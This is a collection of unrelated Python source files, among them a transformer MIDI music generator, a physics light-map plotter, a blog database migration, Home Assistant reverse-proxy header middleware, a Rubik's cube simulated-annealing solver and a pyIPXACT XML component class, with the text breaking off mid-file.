# python main.py -model_path=./checkpoints/unconditional_model_16.ckpt -output_dir=./GeneratedSongs -decode_length=1024 -primer_path=./primers/sad.mid -num_samples=1
"""Unconditioned Transformer."""
import os
import time
from magenta.music.protobuf import music_pb2
import tensorflow.compat.v1 as tf # pylint: disable=import-error
tf.disable_v2_behavior()
from tensor2tensor.utils import decoding
from tensor2tensor.utils import trainer_lib
import GenerateSong.utils as utils
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged: '
'DEBUG, INFO, WARN, ERROR, or FATAL.'
)
flags.DEFINE_string(
'model_name', 'transformer',
'The pre-trained model for sampling.'
)
flags.DEFINE_string(
'hparams_set', 'transformer_tpu',
'Set of hparams to use.'
)
flags.DEFINE_string(
'model_path', './GenerateSong/checkpoints/unconditional_model_16.ckpt',
'Pre-trained model path.'
)
flags.DEFINE_string(
'primer_path', None,
'MIDI file path for priming. If not provided, '
'the model will generate samples without priming.'
)
flags.DEFINE_string(
'output_dir', './GenerateSong/GeneratedSongs',
'Midi output directory.'
)
flags.DEFINE_string(
'sample', 'random',
'Sampling method.'
)
flags.DEFINE_integer(
'max_primer_second', 20,
'Maximum primer duration in seconds.'
)
flags.DEFINE_integer(
'layers', 16,
'Number of hidden layers.'
)
flags.DEFINE_integer(
'beam_size', 1,
'Beam size for inference.'
)
flags.DEFINE_integer(
'decode_length', 2048,
'Length of decode result.'
)
flags.DEFINE_float(
'alpha', 0.0,
'Alpha for decoder.'
)
flags.DEFINE_integer(
'num_samples', 1,
'Number of generated samples.'
)
def generate(estimator, unconditional_encoders, decode_length, targets, primer_ns):
"""
Generate unconditioned music samples from estimator.
:param estimator: Transformer estimator.
:param unconditional_encoders: A dictionary mapping feature keys to their encoders.
:param decode_length: The number of events to decode (the length of the music snippet).
:param targets: Target input for the Transformer.
:param primer_ns: NoteSequence representing the primer.
:return:
"""
tf.gfile.MakeDirs(FLAGS.output_dir)
date_and_time = time.strftime('%Y-%m-%d_%H%M%S')
base_name = os.path.join(
FLAGS.output_dir,
'moodzik.mid'
)
utils.LOGGER.info('Generating %d samples with format %s' % (FLAGS.num_samples, base_name))
for i in range(FLAGS.num_samples):
utils.LOGGER.info('Generating sample %d' % i)
# Start the Estimator, loading from the specified checkpoint.
input_fn = decoding.make_input_fn_from_generator(
utils.unconditional_input_generator(targets, decode_length))
unconditional_samples = estimator.predict(
input_fn, checkpoint_path=FLAGS.model_path)
# Generate sample events.
utils.LOGGER.info('Generating sample.')
sample_ids = next(unconditional_samples)['outputs']
# Decode to NoteSequence
utils.LOGGER.info('Decoding sample id')
midi_filename = utils.decode(
sample_ids,
encoder=unconditional_encoders['targets']
)
unconditional_ns = utils.mm.midi_file_to_note_sequence(midi_filename)
# Append continuation to primer if any.
continuation_ns = utils.mm.concatenate_sequences([primer_ns, unconditional_ns])
utils.mm.sequence_proto_to_midi_file(continuation_ns, base_name.replace('*', '%03d' % i))
def run():
"""
Load Transformer model according to flags and start sampling.
:raises:
ValueError: if required flags are missing or invalid.
"""
if FLAGS.model_path is None:
raise ValueError(
'Required Transformer pre-trained model path.'
)
if FLAGS.output_dir is None:
raise ValueError(
'Required Midi output directory.'
)
if FLAGS.decode_length <= 0:
raise ValueError(
'Decode length must be > 0.'
)
problem = utils.PianoPerformanceLanguageModelProblem()
unconditional_encoders = problem.get_feature_encoders()
primer_ns = music_pb2.NoteSequence()
if FLAGS.primer_path is None:
targets = []
else:
if FLAGS.max_primer_second <= 0:
raise ValueError(
'Max primer second must be > 0.'
)
primer_ns = utils.get_primer_ns(FLAGS.primer_path, FLAGS.max_primer_second)
targets = unconditional_encoders['targets'].encode_note_sequence(primer_ns)
# Remove the end token from the encoded primer.
targets = targets[:-1]
if len(targets) >= FLAGS.decode_length:
raise ValueError(
'Primer has more or equal events than maximum sequence length:'
' %d >= %d; Aborting' % (len(targets), FLAGS.decode_length)
)
decode_length = FLAGS.decode_length - len(targets)
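# For example (illustrative numbers): with decode_length=1024 and a primer that
# encodes to 200 events, the model is asked to generate 824 new events.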
# Set up HParams.
hparams = trainer_lib.create_hparams(hparams_set=FLAGS.hparams_set)
trainer_lib.add_problem_hparams(hparams, problem)
hparams.num_hidden_layers = FLAGS.layers
hparams.sampling_method = FLAGS.sample
# Set up decoding HParams.
decode_hparams = decoding.decode_hparams()
decode_hparams.alpha = FLAGS.alpha
decode_hparams.beam_size = FLAGS.beam_size
# Create Estimator.
utils.LOGGER.info('Loading model')
run_config = trainer_lib.create_run_config(hparams)
estimator = trainer_lib.create_estimator(
FLAGS.model_name, hparams, run_config,
decode_hparams=decode_hparams
)
generate(estimator, unconditional_encoders, decode_length, targets, primer_ns)
def main(unused_argv):
"""Invoke run function, set log level."""
utils.LOGGER.set_verbosity(FLAGS.log)
run()
def generateSong(m):
"""Set the primer for mood `m`, then invoke the main function."""
FLAGS.primer_path = f'./GenerateSong/primers/{m}.mid'
tf.app.run(main)
return True
|
import os
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
from pax.dsputils import InterpolatingMap
from pax.core import data_file_name
from pax import units
# Note: the '.json.gz' extension is appended again below, and the bare path is
# also used as the output directory for the per-map plots, so keep it off here.
map_file = '../../pax/data/XENON100_s2_xy_patterns_Xerawdp0.4.5'
try:
os.mkdir(map_file)
except FileExistsError:
pass
print("Reading map...")
maps = InterpolatingMap(data_file_name(map_file+'.json.gz'))
print("Plotting individual LCE maps")
for m in tqdm(maps.map_names):
# Reference plot of the XENON100 tpc radius
r = 0.5 * 30.6 * units.cm
theta = np.linspace(0, 2*np.pi, 200)
plt.plot(r*np.cos(theta), r*np.sin(theta), c='white')
# Plot the LCE map
maps.plot(map_name=m, to_file=os.path.join(map_file, m + '.png'))
# This is just to test the interpolation routines are working: you can skip it
#
# import numpy as np
# import matplotlib.pyplot as plt
#
# print("Calculating & plotting overall LCE map")
# r = 15.3
# d = 0.2
# y, x = np.mgrid[slice(-r, r + d, d),
# slice(-r, r + d, d)]
# z = np.zeros(x.shape)
# theta = np.linspace(0, 2*np.pi, 200)
# plt.plot(r*np.cos(theta), r*np.sin(theta), c='white')
# # Should vectorize this...
# for i in tqdm(range(len(x))):
# for j in range(len(y)):
# for m in maps.map_names:
# if m == 'total_LCE':
# continue
# z[i,j] += maps.get_value(x[i,j], y[i,j], map_name=m)
# # see http://matplotlib.org/examples/pylab_examples/pcolor_demo.html
# z[:-1:-1]
# z_min, z_max = 0, np.abs(z).max()
# plt.pcolor(x, y, z, vmin=z_min, vmax=z_max)
# plt.title('pcolor')
# plt.axis([x.min(), x.max(), y.min(), y.max()])
# plt.colorbar()
# plt.xlabel('x (cm)')
# plt.ylabel('y (cm)')
# plt.title('S2Top LCE (from MC)')
# plt.savefig('summed_lce.png')
|
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from runserver import app
from maple.extension import db, redis
from maple.model import (Blog, Tag, Category, User, TimeLine, Question,
tag_blog)
engine = create_engine('postgresql://postgres:password@localhost/blog_backup')
session = sessionmaker(bind=engine)()
def date(i):
return {"created_at": i.created_at, "updated_at": i.updated_at}
def upgrade_user():
print('upgrade user ...')
users = session.execute('select * from users;')
User.bulk_save([User(
id=user.id,
username=user.username,
email=user.email,
password=user.password,
is_superuser=user.is_superuser,
is_confirmed=user.is_confirmed) for user in users])
def upgrade_timeline():
print('upgrade timeline ...')
timelines = session.execute('select * from timeline;')
TimeLine.bulk_save([TimeLine(
id=i.id,
content=i.content,
is_hidden=i.hide,
user_id=i.author_id,
**date(i)) for i in timelines])
def upgrade_question():
print('upgrade question ...')
questions = session.execute('select * from questions;')
Question.bulk_save([Question(
id=i.id,
title=i.title,
is_hidden=i.is_private,
answer=i.answer,
description=i.describ,
user_id=i.author_id,
created_at=i.created_at) for i in questions])
def upgrade_blog():
print('upgrade tag ...')
tags = session.execute('select * from tags;')
Tag.bulk_save([Tag(id=i.id, name=i.name) for i in tags])
print('upgrade category ...')
categories = session.execute('select * from categories;')
Category.bulk_save([Category(id=i.id, name=i.name) for i in categories])
print('upgrade blog ...')
blogs = session.execute('select * from blogs;')
Blog.bulk_save([Blog(
id=blog.id,
title=blog.title,
content=blog.content,
content_type=blog.content_type,
is_copy=blog.is_copy,
category_id=blog.category_id,
user_id=blog.author_id,
**date(blog)) for blog in blogs])
print('upgrade tag_blog ...')
tag_blogs = session.execute('select * from tag_blog;')
db.engine.execute(tag_blog.insert(), [{
'tag_id': i.tags_id,
'blog_id': i.blogs_id
} for i in tag_blogs])
def upgrade_setval():
print('upgrade setval ...')
db.engine.execute("select setval('tag_id_seq',(select max(id) from tag))")
db.engine.execute(
"select setval('blog_id_seq',(select max(id) from blog))")
db.engine.execute(
"select setval('category_id_seq',(select max(id) from category))")
db.engine.execute(
"select setval('timeline_id_seq',(select max(id) from timeline))")
db.engine.execute(
"select setval('question_id_seq',(select max(id) from question))")
db.engine.execute(
"select setval('user_id_seq',(select max(id) from \"user\"))")
def upgrade_redis():
print("upgrade redis ...")
redis.rename("visited:article", "count:article:visited")
if __name__ == '__main__':
with app.app_context():
upgrade_user()
upgrade_blog()
upgrade_timeline()
upgrade_question()
upgrade_setval()
upgrade_redis()
|
from turtle import Turtle
from config import BORDER_HEIGHT
ALIGNMENT = 'center'
FONT = ("Arial",15,"normal")
class ScoreBoard(Turtle):
def __init__(self) -> None:
super().__init__()
self.score = 0
self.highScore = self.get_highscore()
self.color("white")
self.penup()
self.hideturtle()
self.goto(0,(BORDER_HEIGHT//2)-30)
self.update_scoreboard()
def update_scoreboard(self):
self.clear()
self.write(f'Score : {self.score} High Score : {self.highScore}',move=False,align=ALIGNMENT,font=FONT)
def reset(self):
if self.score > self.highScore:
self.highScore = self.score
self.set_highscore(self.highScore)
self.score = 0
self.update_scoreboard()
def game_over(self):
self.home()
self.write('GAME OVER',move=False,align=ALIGNMENT,font=FONT)
def increase_score(self):
self.score += 1
self.update_scoreboard()
def get_highscore(self,high_score=0):
with open('highscore_data.txt') as file:
contents = file.read()
return int(contents)
def set_highscore(self,high_score=0):
with open('highscore_data.txt',mode='w') as file:
file.write(f'{high_score}')
s = ScoreBoard()
ll = [s.get_highscore()]
print(type(ll[0]))
|
"""Middleware to handle forwarded data by a reverse proxy."""
from ipaddress import ip_address
import logging
from aiohttp.hdrs import X_FORWARDED_FOR, X_FORWARDED_HOST, X_FORWARDED_PROTO
from aiohttp.web import HTTPBadRequest, middleware
from homeassistant.core import callback
_LOGGER = logging.getLogger(__name__)
# mypy: allow-untyped-defs
@callback
def async_setup_forwarded(app, trusted_proxies):
"""Create forwarded middleware for the app.
Process IP addresses, proto and host information in the forwarded for headers.
`X-Forwarded-For: <client>, <proxy1>, <proxy2>`
e.g., `X-Forwarded-For: 203.0.113.195, 70.41.3.18, 150.172.238.178`
We go through the list from the right side, and skip all entries that are in our
trusted proxies list. The first non-trusted IP is used as the client IP. If all
items in the X-Forwarded-For are trusted, including the most left item (client),
the most left item is used. In the latter case, the client connection originated
from an IP that is also listed as a trusted proxy IP or network.
`X-Forwarded-Proto: <client>, <proxy1>, <proxy2>`
e.g., `X-Forwarded-Proto: https, http, http`
OR `X-Forwarded-Proto: https` (one entry, even with multiple proxies)
The X-Forwarded-Proto is determined based on the corresponding entry of the
X-Forwarded-For header that is used/chosen as the client IP. However,
some proxies, for example, Kubernetes NGINX ingress, only retain one element
in the X-Forwarded-Proto header. In that case, we'll just use what we have.
`X-Forwarded-Host: <host>`
e.g., `X-Forwarded-Host: example.com`
If the previous headers are processed successfully, and the X-Forwarded-Host is
present, it will be used.
Additionally:
- If no X-Forwarded-For header is found, the processing of all headers is skipped.
- Log a warning when untrusted connected peer provides X-Forwarded-For headers.
- If multiple instances of X-Forwarded-For, X-Forwarded-Proto or
X-Forwarded-Host are found, an HTTP 400 status code is thrown.
- If malformed or invalid (IP) data in X-Forwarded-For header is found,
an HTTP 400 status code is thrown.
- The connected client peer on the socket of the incoming connection,
must be trusted for any processing to take place.
- If the number of elements in X-Forwarded-Proto does not equal 1 or
is equal to the number of elements in X-Forwarded-For, an HTTP 400
status code is thrown.
- If an empty X-Forwarded-Host is provided, an HTTP 400 status code is thrown.
- If an empty X-Forwarded-Proto is provided, or an empty element in the list,
an HTTP 400 status code is thrown.
"""
@middleware
async def forwarded_middleware(request, handler):
"""Process forwarded data by a reverse proxy."""
overrides = {}
# Handle X-Forwarded-For
forwarded_for_headers = request.headers.getall(X_FORWARDED_FOR, [])
if not forwarded_for_headers:
# No forwarding headers, continue as normal
return await handler(request)
# Ensure the IP of the connected peer is trusted
connected_ip = ip_address(request.transport.get_extra_info("peername")[0])
if not any(connected_ip in trusted_proxy for trusted_proxy in trusted_proxies):
_LOGGER.warning(
"Received X-Forwarded-For header from untrusted proxy %s, headers not processed",
connected_ip,
)
# Not trusted, continue as normal
return await handler(request)
# Multiple X-Forwarded-For headers
if len(forwarded_for_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forwarded-For: %s", forwarded_for_headers
)
raise HTTPBadRequest
# Process X-Forwarded-For from the right side (by reversing the list)
forwarded_for_split = list(reversed(forwarded_for_headers[0].split(",")))
try:
forwarded_for = [ip_address(addr.strip()) for addr in forwarded_for_split]
except ValueError:
_LOGGER.error(
"Invalid IP address in X-Forwarded-For: %s", forwarded_for_headers[0]
)
raise HTTPBadRequest
# Find the last trusted index in the X-Forwarded-For list
forwarded_for_index = 0
for forwarded_ip in forwarded_for:
if any(forwarded_ip in trusted_proxy for trusted_proxy in trusted_proxies):
forwarded_for_index += 1
continue
overrides["remote"] = str(forwarded_ip)
break
else:
# If all the IP addresses are from trusted networks, take the left-most.
forwarded_for_index = -1
overrides["remote"] = str(forwarded_for[-1])
# Handle X-Forwarded-Proto
forwarded_proto_headers = request.headers.getall(X_FORWARDED_PROTO, [])
if forwarded_proto_headers:
if len(forwarded_proto_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forward-Proto: %s", forwarded_proto_headers
)
raise HTTPBadRequest
forwarded_proto_split = list(
reversed(forwarded_proto_headers[0].split(","))
)
forwarded_proto = [proto.strip() for proto in forwarded_proto_split]
# Catch empty values
if "" in forwarded_proto:
_LOGGER.error(
"Empty item received in X-Forward-Proto header: %s",
forwarded_proto_headers[0],
)
raise HTTPBadRequest
# The X-Forwarded-Proto header contains either one element, or the same
# number of elements as X-Forwarded-For
if len(forwarded_proto) not in (1, len(forwarded_for)):
_LOGGER.error(
"Incorrect number of elements in X-Forward-Proto. Expected 1 or %d, got %d: %s",
len(forwarded_for),
len(forwarded_proto),
forwarded_proto_headers[0],
)
raise HTTPBadRequest
# Ideally this should take the scheme corresponding to the entry
# in X-Forwarded-For that was chosen, but some proxies only retain
# one element. In that case, use what we have.
overrides["scheme"] = forwarded_proto[-1]
if len(forwarded_proto) != 1:
overrides["scheme"] = forwarded_proto[forwarded_for_index]
# Handle X-Forwarded-Host
forwarded_host_headers = request.headers.getall(X_FORWARDED_HOST, [])
if forwarded_host_headers:
# Multiple X-Forwarded-Host headers
if len(forwarded_host_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forwarded-Host: %s", forwarded_host_headers
)
raise HTTPBadRequest
forwarded_host = forwarded_host_headers[0].strip()
if not forwarded_host:
_LOGGER.error("Empty value received in X-Forward-Host header")
raise HTTPBadRequest
overrides["host"] = forwarded_host
# Done, create a new request based on gathered data.
request = request.clone(**overrides)
return await handler(request)
app.middlewares.append(forwarded_middleware)
|
#!/usr/bin/env python
###############################################################################
#
# pairwise2matrix.py - convert list of pairwise scores to distance matrix
#
# File: pairwise2matrix.py
# Author: Alex Stivala
# Created: September 2008
#
#
# Given list of pairwise scores from qptabmatch_allpairs.py output,
# convert to distance matrix by reformatting as matrix and normalizing.
#
# Usage:
# pairwise2matrix.py db_directory < scoresfile > matrixfile
#
# Input is from stdin, tab-delimited in the format
#
# pdbid1 pdbid2 score
#
# Also reads .tableaudistmatrix files from db_directory, as used by
# qptabmatch_allpairs.py, to get orders of tableaux (number of SSEs)
# required for normalization.
#
# Output is to stdout, a (square symmetric) matrix of normalized scores
# between each structure. It is in format suitable for reading in R with
# read.table(filename, header=TRUE)
# i.e. the first line is space-delimited identifiers for each column,
# then the matrix (space delimited)
#
# Requires Numeric library (builds Numeric.array)
#
# $Id: pairwise2matrix.py 2703 2009-07-27 06:01:05Z astivala $
#
###############################################################################
import sys,os,glob
import numpy.oldnumeric as Numeric
from norms import norm1,norm2,norm3
def usage(progname):
"""
Print usage message and exit
"""
sys.stderr.write("Usage: " + progname + " <db_directory>\n")
sys.exit(1)
def main():
"""
main for pairwise2matrix.py
"""
if len(sys.argv) != 2:
usage(os.path.basename(sys.argv[0]))
db_directory = sys.argv[1]
# get numbers of SSEs from .tableaudistmatrix files in db_directory
# build dict of {name : size}
size_dict = {}
input_list = glob.glob(os.path.join(db_directory, '*.tableaudistmatrix'))
for dbfile in input_list:
idline = open(dbfile).readline()
qid = idline[:8].lstrip().rstrip()
qsize = int(idline[8:])
size_dict[qid] = qsize
scoredict = {}
for line in sys.stdin:
if line[0] == '#':
continue
s = line.split('\t')
scoredict[(s[0],s[1])] = float(s[2])
# get list of unique names (identifiers)
allnames = [k[0] for k in scoredict.keys() ] + \
[k[1] for k in scoredict.keys() ]
namedict = {}
for name in allnames:
namedict[name] = name
names = namedict.values()
n = len(names)
assert(len(scoredict) == n*(n-1)/2) # n(n-1)/2 comparisons for n things
# build dictionary mapping identifiers (names) to indices for the matrix
idict = dict([(b,a) for (a,b) in enumerate(names)])
# build the distance matrix
distmatrix = Numeric.zeros((n,n),'d')
for ((name1,name2),score) in scoredict.iteritems():
i = idict[name1]
j = idict[name2]
normscore = norm3(score, size_dict[name1], size_dict[name2])
distmatrix[i,j] = normscore
distmatrix[j,i] = normscore
namestr = reduce(lambda a,b : a+' '+b, names)
print namestr
for i in xrange(n):
for j in xrange(n):
sys.stdout.write('%.4f ' % distmatrix[i,j])
sys.stdout.write('\n')
if __name__ == "__main__":
main()
|
#/**
# *\file Simulated_Annealing.py
# *\brief This code contains the simulated annealing algorithm implemented
# * to solve the Assignment 2, group project, Rubik's cube problem
# * - Solves both n=2, n=3 cubes
# * - Utilises a calculate_cost() function based on the number of misplaced cube element faces
# * - Utilises a mixture of annealing and tempering to obtain a solved cube state
# *\Note - The cost value has a maximum and a minimum and is discrete for our purposes, resulting in many delta=0 moves
# *\Author F.OSuibhne
# *\Version V1.1
# *\Date 10-04-21
# */
from rubiks_cube import RubiksCube
#from solve_random_cubes import random_cube, run #< Don't believe run is used anymore
import time
#import numpy as np
import random
import math
from copy import deepcopy
def Simulated_Annealing():
start = time.time() #< Timer activated for runtime
T_0 = 35 #< Starting Temperature, n=2 Temp= 2.86 / in theory: n=3 Temp= 35 see STD_cost() below
Temp = T_0
Cooling_Rate = .99 #< Determines how fast the algorithm completes (slower cooling is more likely to reach the goal)
# should be a positive value between 0 and 1. Ideally it should be chosen together with the max temperature
# and the acceptance probability: if too high, much time is wasted; if too low, local minima are not avoided
Current_State = RubiksCube(n=3, randomize = True) #< Call for a new random Rubik's cube state of size nxnxn
print("Cube Start State\n",Current_State.cube, "\n\n\n") #< Don't remove without uncommenting line 32
#Current_State.cube
print("Initial Cube of cost = ", Current_State.calculate_cost())
N_Moves = 0 #< Initialise counter, no. of accepted moves to reach goal
MKV_Chain_Count = 0 #< Initialise counter, consecutive iterations without improvement
Current_Best_State = deepcopy(Current_State) #< Initialise
Best_Cost = Current_Best_State.calculate_cost() #< Initialise
Initial_Best_Cost = deepcopy(Best_Cost) #< Retaining copy of initial state
#________ Checks for Unmixed Cube ___________
if Current_State.is_solved()==True: #Checks for goal state
print("Failure: Initialised random state is alread goal") #< Failure because algorithm didnt do anything
return Current_State
while Temp > .001: #< Final temperature ~0; it can't be exactly 0, since (Temp = Temp*Cooling_Rate) would never reach it
MKV_Chain = 0 #< Reset counter
while MKV_Chain < 20: #< length of each markov chain, (I think should be 18^2, confused on formula)
#_________ Make & Evaluate Move ________
Next_State = deepcopy(Current_State)
Next_State.apply_move(Next_State.get_random_move()) #Apply_Random_Move(Current_State) # Get 1 of 18 random next moves, apply and obtain the state
Current_Cost = Current_State.calculate_cost()
Next_Cost = Next_State.calculate_cost()
Delta_Cost = Next_Cost - Current_Cost #< Calculate gain or loss of accepting move
# Goal is cost reduction smaller cost is better
# delta would be negative if Next is desirable
#_________ Checks for Goal State __________
if Next_State.is_solved() == True: #< Accepts if at final goal state
Current_Best_State = deepcopy(Next_State)
duration = time.time() - start #< Calculate run time
print("Goal state reached after", N_Moves, " Moves after ", duration, " seconds")
return Current_Best_State.cube #< Returns whole goal state cube
#__________ Annealing Steps ____________
if Delta_Cost < 0: #< If improvement, always accept the next state
#< NOTE: very discrete cost values mean delta of 0 is common
# this poses an issue with the probability calculation later
Current_State = deepcopy(Next_State)
N_Moves=N_Moves+1
else:
if Delta_Cost == 0:
Delta_Cost = .1
probability = math.exp(-(Delta_Cost/Temp)) #< A value between 0-1, approaches 1 as T increases
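# Illustrative numbers (not from the original code): with Delta_Cost = 2 and
# Temp = 10, probability = exp(-0.2) ~ 0.82, so the worse move is usually
# accepted; at Temp = 0.5 the same delta gives exp(-4) ~ 0.018, so it is
# almost always rejected.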
rando = random.uniform(0,1)
if probability > rando: #< Accepts non-beneficial actions based on probability; as Temp
# decreases, the probability of acceptance must reduce
Current_State = deepcopy(Next_State)
N_Moves=N_Moves+1
#___________ Save Record _____________
if Best_Cost > Current_Cost: #< If new record, save updated state info
Current_Best_State = deepcopy(Current_State)
Best_Cost = Current_Cost
MKV_Chain = MKV_Chain+1 #< Counter
Temp = Temp*Cooling_Rate #< Iteratively decreasing the temperature
#__________ Tempering Steps __________
if Best_Cost == Initial_Best_Cost:
MKV_Chain_Count = MKV_Chain_Count+1 #< Counter for non-improvement
else:
Initial_Best_Cost = Best_Cost
MKV_Chain_Count = 0 #< Reset counter
if MKV_Chain_Count == 20: #< if no improvement for a fixed no. of iterations
Temp = 2.86 #< Reset annealing temperature
MKV_Chain_Count = 0
duration = time.time() - start #< Calculate run time
print("Failed to reach goal state, Best cost obtained was", Best_Cost)
print("State reached after", N_Moves, " Moves after ", duration, " seconds")
return(Current_Best_State.cube) #< Returns Non-Goal final state
print(Simulated_Annealing())
#__________ Utilised to calculate a mean and std individually _________
def STD_cost():
x=0
Total=0
sum=0
while x<200:
Current_State = RubiksCube(n=3, randomize = True)
Cost = Current_State.calculate_cost()
#Total = Total+Cost
sum = sum + (Cost-25.3)*(Cost-25.3)
x=x+1
#mean = Total/200
sigma= math.sqrt(sum/200)
return (sigma)
#_Resulting std used for
#for n=2x2x2 cube, mean = 25.99, sigma = 2.684
#for n=3x3x3 cube, mean = 59.41, sigma = 35.09
#print(STD_cost())
|
from rest_framework_extensions.routers import ExtendedSimpleRouter
from .views import PostViewset
router = ExtendedSimpleRouter()
router.register(r'posts', PostViewset, base_name='posts')
urlpatterns = router.urls
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
# =============================================================================
# ___ ______ __ _ ____ _____
# _ __ _ _|_ _| _ \ \/ / / \ / ___|_ _|
# | '_ \| | | || || |_) \ / / _ \| | | |
# | |_) | |_| || || __// \ / ___ \ |___ | |
# | .__/ \__, |___|_| /_/\_\/_/ \_\____| |_|
# |_| |___/
# =============================================================================
# Authors: Patrick Lehmann
#
# Python module: A DOM based IP-XACT implementation for Python
#
# Description:
# ------------------------------------
# TODO:
#
# License:
# ==============================================================================
# Copyright 2007-2016 Patrick Lehmann - Dresden, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
from textwrap import dedent
from pyIPXACT import RootElement, __DEFAULT_SCHEMA__
class Component(RootElement):
"""Represents an IP-XACT components."""
def __init__(self, vlnv, description):
super().__init__(vlnv)
self._description = description
self._busInterfaces = []
self._indirectInterfaces = []
self._channels = []
self._remapStates = []
self._addressSpaces = []
self._memoryMaps = []
self._model = None
self._componentGenerators = []
self._choices = []
self._fileSets = []
self._whiteboxElements = []
self._cpus = []
self._otherClockDrivers = []
self._resetTypes = []
self._parameters = []
self._assertions = []
def SetItem(self, item):
if isinstance(item, Model): self._model = item
else:
raise ValueError()
def AddItem(self, item):
if isinstance(item, BusInterface): self._busInterfaces.append(item)
elif isinstance(item, IndirectInterface): self._indirectInterfaces.append(item)
elif isinstance(item, Channel): self._channels.append(item)
elif isinstance(item, RemapState): self._remapStates.append(item)
elif isinstance(item, AddressSpace): self._addressSpaces.append(item)
elif isinstance(item, MemoryMap): self._memoryMaps.append(item)
elif isinstance(item, ComponentGenerator): self._componentGenerators.append(item)
elif isinstance(item, Choice): self._choices.append(item)
elif isinstance(item, FileSet): self._fileSets.append(item)
elif isinstance(item, WhiteboxElement): self._whiteboxElements.append(item)
elif isinstance(item, Cpu): self._cpus.append(item)
elif isinstance(item, OtherClockDriver): self._otherClockDrivers.append(item)
elif isinstance(item, ResetType): self._resetTypes.append(item)
elif isinstance(item, Parameter): self._parameters.append(item)
elif isinstance(item, Assertion): self._assertions.append(item)
else:
raise ValueError()
def ToXml(self):
"""Converts the object's data into XML format."""
buffer = dedent("""\
<?xml version="1.0" encoding="UTF-8"?>
<{xmlns}:component
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:{xmlns}="{schemaUri}"
xsi:schemaLocation="{schemaUri} {schemaUrl}">
{versionedIdentifier}
<{xmlns}:description>{description}</{xmlns}:description>
""").format(
xmlns=__DEFAULT_SCHEMA__.NamespacePrefix,
schemaUri=__DEFAULT_SCHEMA__.SchemaUri,
schemaUrl=__DEFAULT_SCHEMA__.SchemaUrl,
versionedIdentifier=self._vlnv.ToXml(isVersionedIdentifier=True),
description=self._description
)
if self._busInterfaces:
buffer += "\t<{xmlns}:busInterfaces>\n"
for busInterface in self._busInterfaces:
buffer += busInterface.ToXml(2)
buffer += "\t</{xmlns}:busInterfaces>\n"
if self._indirectInterfaces:
buffer += "\t<{xmlns}:indirectInterfaces>\n"
for indirectInterface in self._indirectInterfaces:
buffer += indirectInterface.ToXml(2)
buffer += "\t</{xmlns}:indirectInterfaces>\n"
if self._channels:
buffer += "\t<{xmlns}:channels>\n"
for channel in self._channels:
buffer += channel.ToXml(2)
buffer += "\t</{xmlns}:channels>\n"
if self._remapStates:
buffer += "\t<{xmlns}:remapStates>\n"
for remapState in self._remapStates:
buffer += remapState.ToXml(2)
buffer += "\t</{xmlns}:remapStates>\n"
if self._addressSpaces:
buffer += "\t<{xmlns}:addressSpaces>\n"
for addressSpace in self._addressSpaces:
buffer += addressSpace.ToXml(2)
buffer += "\t</{xmlns}:addressSpaces>\n"
if self._memoryMaps:
buffer += "\t<{xmlns}:memoryMaps>\n"
for memoryMap in self._memoryMaps:
buffer += memoryMap.ToXml(2)
buffer += "\t</{xmlns}:memoryMaps>\n"
if self._model:
buffer += "\t<{xmlns}:model>\n"
buffer += self._model.ToXml(2)
buffer += "\t</{xmlns}:model>\n"
if self._componentGenerators:
buffer += "\t<{xmlns}:componentGenerators>\n"
for componentGenerator in self._componentGenerators:
buffer += componentGenerator.ToXml(2)
buffer += "\t</{xmlns}:componentGenerators>\n"
if self._choices:
buffer += "\t<{xmlns}:choices>\n"
for choice in self._choices:
buffer += choice.ToXml(2)
buffer += "\t</{xmlns}:choices>\n"
if self._fileSets:
buffer += "\t<{xmlns}:fileSets>\n"
for fileSet in self._fileSets:
buffer += fileSet.ToXml(2)
buffer += "\t</{xmlns}:fileSets>\n"
if self._whiteboxElements:
buffer += "\t<{xmlns}:whiteboxElements>\n"
for whiteboxElement in self._whiteboxElements:
buffer += whiteboxElement.ToXml(2)
buffer += "\t</{xmlns}:whiteboxElements>\n"
if self._cpus:
buffer += "\t<{xmlns}:cpus>\n"
for cpu in self._cpus:
buffer += cpu.ToXml(2)
buffer += "\t</{xmlns}:cpus>\n"
if self._otherClockDrivers:
buffer += "\t<{xmlns}:otherClockDrivers>\n"
for otherClockDriver in self._otherClockDrivers:
buffer += otherClockDriver.ToXml(2)
buffer += "\t</{xmlns}:otherClockDrivers>\n"
if self._resetTypes:
buffer += "\t<{xmlns}:resetTypes>\n"
for resetType in self._resetTypes:
buffer += resetType.ToXml(2)
buffer += "\t</{xmlns}:resetTypes>\n"
if self._parameters:
buffer += "\t<{xmlns}:parameters>\n"
for parameter in self._parameters:
buffer += parameter.ToXml(2)
buffer += "\t</{xmlns}:parameters>\n"
if self._assertions:
buffer += "\t<{xmlns}:assertions>\n"
for assertion in self._assertions:
buffer += assertion.ToXml(2)
buffer += "\t</{xmlns}:assertions>\n"
buffer += dedent("""\
</{xmlns}:component>
""")
return buffer.format(xmlns=__DEFAULT_SCHEMA__.NamespacePrefix)
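# Minimal usage sketch (illustrative; `vlnv` stands for a pyIPXACT VLNV object
# created elsewhere, as expected by RootElement):
#   component = Component(vlnv, "Example component")
#   component.AddItem(Parameter())
#   xml = component.ToXml()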
class BusInterface:
"""Represents an IP-XACT bus interface."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class IndirectInterface:
"""Represents an IP-XACT indirect interface."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Channel:
